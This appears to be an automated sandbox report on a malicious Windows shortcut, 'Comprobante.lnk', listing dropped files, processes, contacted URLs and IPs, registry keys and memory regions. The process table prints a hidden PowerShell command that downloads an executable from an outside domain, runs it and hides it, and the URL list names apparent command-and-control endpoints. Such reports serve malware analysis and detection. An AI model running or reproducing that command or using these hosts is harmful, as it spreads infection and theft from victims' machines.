Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Comprobante.lnk.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\Desktop\mjtjewi.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mjtjewi.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unwrbiun.5ww.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\6c132e98e5a06fd825caf0498d9711c3_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3BDBEQO9NFNA05DW626L.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7b78f1e09efa3ae5.customDestinations-ms (copy)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object
System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item
'mjtjewi.exe').Attributes += 'Hidden';
|
|
|
|
C:\Windows\System32\OpenWith.exe
|
"C:\Windows\system32\OpenWith.exe"
|
|
|
|
C:\Users\user\Desktop\mjtjewi.exe
|
"C:\Users\user\Desktop\mjtjewi.exe"
|
|
|
|
C:\Users\user\Desktop\mjtjewi.exe
|
C:\Users\user\Desktop\mjtjewi.exe
|
|
|
|
C:\Users\user\Desktop\mjtjewi.exe
|
C:\Users\user\Desktop\mjtjewi.exe
|
|
|
|
C:\Users\user\Desktop\mjtjewi.exe
|
C:\Users\user\Desktop\mjtjewi.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
|
45.149.241.169
|
|
|
|
http://kbfvzoboss.bid/alien/fre.php
|
|
||
|
http://alphastand.top/alien/fre.php
|
|
||
|
http://alphastand.win/alien/fre.php
|
|
||
|
http://alphastand.trade/alien/fre.php
|
|
||
|
https://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif
|
188.114.96.3
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.ibsensoftware.com/
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phpy
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://microsoft.coF
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.microsoft.c
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
freighteighttwocam.ddns.net
|
45.149.241.169
|
|
|
|
www.sodiumlaurethsulfatedesyroyer.com
|
188.114.96.3
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
www.sodiumlaurethsulfatedesyroyer.com
|
European Union
|
|
|
|
45.149.241.169
|
freighteighttwocam.ddns.net
|
Germany
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
AC8000
|
heap
|
page read and write
|
|
|
|
4A28000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
2FD4000
|
trusted library allocation
|
page read and write
|
|
|
|
2FBA000
|
trusted library allocation
|
page read and write
|
|
|
|
2F98000
|
trusted library allocation
|
page read and write
|
|
|
|
2BAD83E000
|
stack
|
page read and write
|
||
|
AF1D000
|
stack
|
page read and write
|
||
|
1550000
|
heap
|
page read and write
|
||
|
20C4CF18000
|
trusted library allocation
|
page read and write
|
||
|
177074C0000
|
heap
|
page read and write
|
||
|
7FFE7E000000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DF01000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BAD37D000
|
stack
|
page read and write
|
||
|
20C4990E000
|
heap
|
page read and write
|
||
|
1530000
|
trusted library allocation
|
page read and write
|
||
|
E33E000
|
stack
|
page read and write
|
||
|
7FFE7E040000
|
trusted library allocation
|
page read and write
|
||
|
13CF000
|
stack
|
page read and write
|
||
|
2BAE50D000
|
stack
|
page read and write
|
||
|
20C4B300000
|
heap
|
page read and write
|
||
|
B70000
|
unkown
|
page execute and read and write
|
||
|
20C4CC2A000
|
trusted library allocation
|
page read and write
|
||
|
AE1E000
|
stack
|
page read and write
|
||
|
BCE000
|
unkown
|
page readonly
|
||
|
ACDE000
|
stack
|
page read and write
|
||
|
2DE0000
|
trusted library section
|
page read and write
|
||
|
20C5BA82000
|
trusted library allocation
|
page read and write
|
||
|
102E000
|
stack
|
page read and write
|
||
|
7FFE7DE36000
|
trusted library allocation
|
page execute and read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
4A0000
|
remote allocation
|
page execute and read and write
|
||
|
2530000
|
heap
|
page read and write
|
||
|
44BB58E000
|
stack
|
page read and write
|
||
|
2BADABC000
|
stack
|
page read and write
|
||
|
C50000
|
heap
|
page read and write
|
||
|
17707420000
|
heap
|
page read and write
|
||
|
2DBE000
|
stack
|
page read and write
|
||
|
C3E000
|
stack
|
page read and write
|
||
|
B72000
|
unkown
|
page readonly
|
||
|
BC2000
|
unkown
|
page execute and read and write
|
||
|
475E000
|
trusted library allocation
|
page read and write
|
||
|
20C63988000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
20C63AD0000
|
heap
|
page read and write
|
||
|
7FFE7DD54000
|
trusted library allocation
|
page read and write
|
||
|
11D0000
|
heap
|
page read and write
|
||
|
1510000
|
trusted library allocation
|
page read and write
|
||
|
20C49A90000
|
heap
|
page read and write
|
||
|
7FFE7DFE0000
|
trusted library allocation
|
page read and write
|
||
|
B70000
|
unkown
|
page readonly
|
||
|
2BAD679000
|
stack
|
page read and write
|
||
|
20C638D0000
|
heap
|
page read and write
|
||
|
7FFE7DF60000
|
trusted library allocation
|
page read and write
|
||
|
54EE000
|
stack
|
page read and write
|
||
|
7FFE7E090000
|
trusted library allocation
|
page read and write
|
||
|
2BAD4FF000
|
stack
|
page read and write
|
||
|
2BAD6BF000
|
stack
|
page read and write
|
||
|
7FFE7E080000
|
trusted library allocation
|
page read and write
|
||
|
20C63C42000
|
heap
|
page read and write
|
||
|
1296000
|
heap
|
page read and write
|
||
|
E1FE000
|
stack
|
page read and write
|
||
|
14D4000
|
trusted library allocation
|
page read and write
|
||
|
14F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E0B0000
|
trusted library allocation
|
page read and write
|
||
|
2FB5000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7E050000
|
trusted library allocation
|
page read and write
|
||
|
20C4D50A000
|
trusted library allocation
|
page read and write
|
||
|
2BAD93F000
|
stack
|
page read and write
|
||
|
20C4B380000
|
trusted library allocation
|
page read and write
|
||
|
20C49914000
|
heap
|
page read and write
|
||
|
BCD0000
|
trusted library allocation
|
page read and write
|
||
|
2FF3000
|
trusted library allocation
|
page read and write
|
||
|
20C4CEF3000
|
trusted library allocation
|
page read and write
|
||
|
20C49A95000
|
heap
|
page read and write
|
||
|
11B0000
|
trusted library allocation
|
page read and write
|
||
|
2D7C000
|
stack
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
E17B000
|
trusted library section
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
B09E000
|
stack
|
page read and write
|
||
|
20C4B580000
|
heap
|
page read and write
|
||
|
7FFE7E010000
|
trusted library allocation
|
page read and write
|
||
|
20C498AB000
|
heap
|
page read and write
|
||
|
2D3E000
|
stack
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
E186000
|
trusted library allocation
|
page read and write
|
||
|
AF50000
|
trusted library allocation
|
page execute and read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
7FFE7E020000
|
trusted library allocation
|
page read and write
|
||
|
B72000
|
unkown
|
page execute and read and write
|
||
|
20C63C5C000
|
heap
|
page read and write
|
||
|
20C4CEEE000
|
trusted library allocation
|
page read and write
|
||
|
2BAD5FD000
|
stack
|
page read and write
|
||
|
AA4E000
|
stack
|
page read and write
|
||
|
E120000
|
trusted library section
|
page read and write
|
||
|
7FFE7DF50000
|
trusted library allocation
|
page read and write
|
||
|
284F000
|
stack
|
page read and write
|
||
|
20C4CF06000
|
trusted library allocation
|
page read and write
|
||
|
3F11000
|
trusted library allocation
|
page read and write
|
||
|
17707430000
|
heap
|
page read and write
|
||
|
2BAD737000
|
stack
|
page read and write
|
||
|
20C639B1000
|
heap
|
page read and write
|
||
|
11C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B3F000
|
stack
|
page read and write
|
||
|
1212000
|
heap
|
page read and write
|
||
|
20C63938000
|
heap
|
page read and write
|
||
|
551C000
|
trusted library allocation
|
page read and write
|
||
|
20C4D444000
|
trusted library allocation
|
page read and write
|
||
|
E48000
|
heap
|
page read and write
|
||
|
4792000
|
trusted library allocation
|
page read and write
|
||
|
20C49700000
|
heap
|
page read and write
|
||
|
E180000
|
trusted library allocation
|
page read and write
|
||
|
2BAD8BE000
|
stack
|
page read and write
|
||
|
ABE000
|
stack
|
page read and write
|
||
|
2BAD57E000
|
stack
|
page read and write
|
||
|
20C63993000
|
heap
|
page read and write
|
||
|
7FFE7DFF0000
|
trusted library allocation
|
page read and write
|
||
|
20C63BF1000
|
heap
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
5529000
|
trusted library allocation
|
page read and write
|
||
|
CCE000
|
stack
|
page read and write
|
||
|
3F15000
|
trusted library allocation
|
page read and write
|
||
|
4A0000
|
remote allocation
|
page execute and read and write
|
||
|
7FFE7DD52000
|
trusted library allocation
|
page read and write
|
||
|
4958000
|
trusted library allocation
|
page read and write
|
||
|
5510000
|
trusted library allocation
|
page read and write
|
||
|
14E0000
|
trusted library allocation
|
page read and write
|
||
|
8CC000
|
stack
|
page read and write
|
||
|
20C4B95C000
|
trusted library allocation
|
page read and write
|
||
|
11FB000
|
heap
|
page read and write
|
||
|
20C4BB02000
|
trusted library allocation
|
page read and write
|
||
|
1160000
|
heap
|
page read and write
|
||
|
7FFE7DFB0000
|
trusted library allocation
|
page read and write
|
||
|
2BAD27E000
|
stack
|
page read and write
|
||
|
20C63AA7000
|
heap
|
page execute and read and write
|
||
|
2F11000
|
trusted library allocation
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
11F7000
|
heap
|
page read and write
|
||
|
7FFE7DE10000
|
trusted library allocation
|
page execute and read and write
|
||
|
20C4B3A1000
|
heap
|
page read and write
|
||
|
AB4E000
|
stack
|
page read and write
|
||
|
20C638F5000
|
heap
|
page read and write
|
||
|
7FFE7DF0A000
|
trusted library allocation
|
page read and write
|
||
|
123F000
|
heap
|
page read and write
|
||
|
20C4B340000
|
trusted library allocation
|
page read and write
|
||
|
E18B000
|
trusted library allocation
|
page read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
5530000
|
trusted library allocation
|
page read and write
|
||
|
CE8000
|
heap
|
page read and write
|
||
|
44BB48C000
|
stack
|
page read and write
|
||
|
17708F20000
|
heap
|
page read and write
|
||
|
50AD000
|
stack
|
page read and write
|
||
|
44BB50E000
|
stack
|
page read and write
|
||
|
17708FB4000
|
heap
|
page read and write
|
||
|
20C63BC6000
|
heap
|
page read and write
|
||
|
25B0000
|
heap
|
page read and write
|
||
|
E5FE000
|
stack
|
page read and write
|
||
|
BC2000
|
unkown
|
page readonly
|
||
|
2BAD9BE000
|
stack
|
page read and write
|
||
|
20C63AB0000
|
heap
|
page read and write
|
||
|
20C4B395000
|
heap
|
page read and write
|
||
|
A75000
|
heap
|
page read and write
|
||
|
E1B5000
|
trusted library allocation
|
page read and write
|
||
|
11CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7DFA0000
|
trusted library allocation
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
20C4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
11DE000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
2FF1000
|
trusted library allocation
|
page read and write
|
||
|
20C49800000
|
heap
|
page read and write
|
||
|
E190000
|
trusted library allocation
|
page read and write
|
||
|
5500000
|
heap
|
page execute and read and write
|
||
|
2DD0000
|
heap
|
page execute and read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
7DB000
|
stack
|
page read and write
|
||
|
1180000
|
heap
|
page read and write
|
||
|
20C638D2000
|
heap
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
9CD000
|
stack
|
page read and write
|
||
|
48BC000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BAD838000
|
stack
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
20C63C4C000
|
heap
|
page read and write
|
||
|
20C49940000
|
heap
|
page read and write
|
||
|
AC90000
|
trusted library allocation
|
page execute and read and write
|
||
|
20C498CC000
|
heap
|
page read and write
|
||
|
7FFE7DF70000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DF80000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE00000
|
trusted library allocation
|
page read and write
|
||
|
4888000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DFD0000
|
trusted library allocation
|
page read and write
|
||
|
20C4B2F0000
|
heap
|
page readonly
|
||
|
20C5B93F000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
20C49868000
|
heap
|
page read and write
|
||
|
17707470000
|
heap
|
page read and write
|
||
|
2BACFF5000
|
stack
|
page read and write
|
||
|
2BAD47B000
|
stack
|
page read and write
|
||
|
7FFE7DF32000
|
trusted library allocation
|
page read and write
|
||
|
1520000
|
trusted library allocation
|
page execute and read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
11C0000
|
trusted library allocation
|
page read and write
|
||
|
20C4B560000
|
heap
|
page execute and read and write
|
||
|
FAF000
|
stack
|
page read and write
|
||
|
20C49842000
|
heap
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
E6B000
|
stack
|
page read and write
|
||
|
14D0000
|
trusted library allocation
|
page read and write
|
||
|
20C4CFC2000
|
trusted library allocation
|
page read and write
|
||
|
4FA0000
|
trusted library section
|
page read and write
|
||
|
7DF4522C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20C49830000
|
heap
|
page read and write
|
||
|
20C49A60000
|
trusted library allocation
|
page read and write
|
||
|
ADDD000
|
stack
|
page read and write
|
||
|
7FFE7DD6B000
|
trusted library allocation
|
page read and write
|
||
|
2BAE48F000
|
stack
|
page read and write
|
||
|
D25000
|
heap
|
page read and write
|
||
|
6DC000
|
stack
|
page read and write
|
||
|
A8C000
|
stack
|
page read and write
|
||
|
1205000
|
heap
|
page read and write
|
||
|
7FFE7DF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7DEF0000
|
trusted library allocation
|
page read and write
|
||
|
2BAD7B9000
|
stack
|
page read and write
|
||
|
5519000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E060000
|
trusted library allocation
|
page read and write
|
||
|
20C63C17000
|
heap
|
page read and write
|
||
|
7FFE7E070000
|
trusted library allocation
|
page read and write
|
||
|
47FD000
|
trusted library allocation
|
page read and write
|
||
|
177074C8000
|
heap
|
page read and write
|
||
|
20C4B343000
|
trusted library allocation
|
page read and write
|
||
|
E1A1000
|
trusted library allocation
|
page read and write
|
||
|
C45000
|
heap
|
page read and write
|
||
|
20C63C55000
|
heap
|
page read and write
|
||
|
20C4D50E000
|
trusted library allocation
|
page read and write
|
||
|
11C4000
|
trusted library allocation
|
page read and write
|
||
|
20C4C502000
|
trusted library allocation
|
page read and write
|
||
|
E2FE000
|
stack
|
page read and write
|
||
|
2DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20C5B8D1000
|
trusted library allocation
|
page read and write
|
||
|
14E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
D8F000
|
stack
|
page read and write
|
||
|
AF9D000
|
stack
|
page read and write
|
||
|
2BADA3F000
|
stack
|
page read and write
|
||
|
B8D000
|
stack
|
page read and write
|
||
|
F68000
|
stack
|
page read and write
|
||
|
7FFE7DFC0000
|
trusted library allocation
|
page read and write
|
||
|
B0A000
|
heap
|
page read and write
|
||
|
7FFE7E0A0000
|
trusted library allocation
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
20C63936000
|
heap
|
page read and write
|
||
|
17708FB0000
|
heap
|
page read and write
|
||
|
4F20000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD53000
|
trusted library allocation
|
page execute and read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
20C497E0000
|
heap
|
page read and write
|
||
|
14F7000
|
trusted library allocation
|
page execute and read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
54F0000
|
trusted library allocation
|
page read and write
|
||
|
5540000
|
heap
|
page read and write
|
||
|
14CF000
|
stack
|
page read and write
|
||
|
2FB3000
|
trusted library allocation
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
20C498E6000
|
heap
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
D20000
|
heap
|
page read and write
|
||
|
20C5B8E0000
|
trusted library allocation
|
page read and write
|
||
|
12B3000
|
heap
|
page read and write
|
||
|
AC8D000
|
stack
|
page read and write
|
||
|
11D8000
|
heap
|
page read and write
|
||
|
7FFE7E030000
|
trusted library allocation
|
page read and write
|
||
|
E6FE000
|
stack
|
page read and write
|
||
|
2BAD2FE000
|
stack
|
page read and write
|
||
|
115E000
|
stack
|
page read and write
|
||
|
14EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
14FB000
|
trusted library allocation
|
page execute and read and write
|
||
|
1540000
|
trusted library allocation
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
7FFE7DD5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
AB8E000
|
stack
|
page read and write
|
||
|
E19E000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DD60000
|
trusted library allocation
|
page read and write
|
||
|
20C63C0D000
|
heap
|
page read and write
|
||
|
20C63AA0000
|
heap
|
page execute and read and write
|
||
|
1045000
|
heap
|
page read and write
|
||
|
E4FF000
|
stack
|
page read and write
|
||
|
20C4B390000
|
heap
|
page read and write
|
||
|
20C498C6000
|
heap
|
page read and write
|
||
|
7FFE7DF90000
|
trusted library allocation
|
page read and write
|
||
|
1040000
|
heap
|
page read and write
|
||
|
20C4B8D1000
|
trusted library allocation
|
page read and write
|
||
|
AF9000
|
heap
|
page read and write
|
||
|
2BAD3FE000
|
stack
|
page read and write
|
||
|
7FFE7DE06000
|
trusted library allocation
|
page read and write
|
||
|
7A0E000
|
stack
|
page read and write
|
||
|
20C4CF14000
|
trusted library allocation
|
page read and write
|
||
|
20C639B8000
|
heap
|
page read and write
|
||
|
20C4CF2C000
|
trusted library allocation
|
page read and write
|
||
|
2C7F000
|
stack
|
page read and write
|
||
|
20C4B4C0000
|
heap
|
page execute and read and write
|
||
|
790E000
|
stack
|
page read and write
|
||
|
20C63BB0000
|
heap
|
page read and write
|
||
|
48F0000
|
trusted library allocation
|
page read and write
|
There are 300 hidden memdumps, click here to show them.